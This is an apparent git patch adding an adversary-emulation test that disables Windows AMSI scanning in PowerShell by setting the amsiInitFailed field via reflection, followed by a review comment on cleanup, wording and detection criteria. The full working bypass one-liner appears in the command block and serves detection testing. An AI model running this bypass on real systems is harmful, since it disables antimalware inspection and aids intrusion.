From 26263baec9e87f6624953b5f79d0565f552022ef Mon Sep 17 00:00:00 2001
From: JimmyAstle
Date: Tue, 17 Sep 2019 14:33:22 -0400
Subject: [PATCH] New Detection - T1089 (#568)

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. This is a simple atomic test that executes this unhooking behavior
---
 atomics/T1089/T1089.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml
index 30f5839e..83a9f35a 100644
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -150,3 +150,16 @@ atomic_tests:
 sysmon -u
 cleanup_command: |
 sysmon -i -accepteula
+
+- name: AMSI Bypass - AMSI InitFailed
+ description: |
+ Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
+ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+ supported_platforms:
+ - windows
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
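Review bot: The new test defines no `cleanup_command`, unlike the sysmon test whose `cleanup_command: |` / `sysmon -i -accepteula` lines form the context directly above it, so after the test runs the `amsiInitFailed` field remains set for the lifetime of the PowerShell process the executor used; either a cleanup step that resets that same field to `$false`, or a sentence in `description` stating that the effect is session-scoped and a fresh PowerShell process restores normal AMSI scanning, would leave the host's state documented and recoverable. The `description` also misnames what is modified: `amsiInitFailed` is a static field set by reflection (as the `GetField(...).SetValue(...)` call shows), not a function, and nothing in the command patches the DLL in memory, so "patch the dll in memory setting the "amsiInitFailed" function to true" would more accurately read "set the private static `amsiInitFailed` field of `AmsiUtils` to true via reflection". Wording aside, "Any easy way to bypass AMSI inspection is it patch" should read "An easy way to bypass AMSI inspection is to patch". Since this is a detection test, a short note in `description` naming the expected observable (a PowerShell script-block log entry containing the reflection call, given the executor is `powershell`) would make the test's pass/fail criterion explicit rather than implied by the linked article.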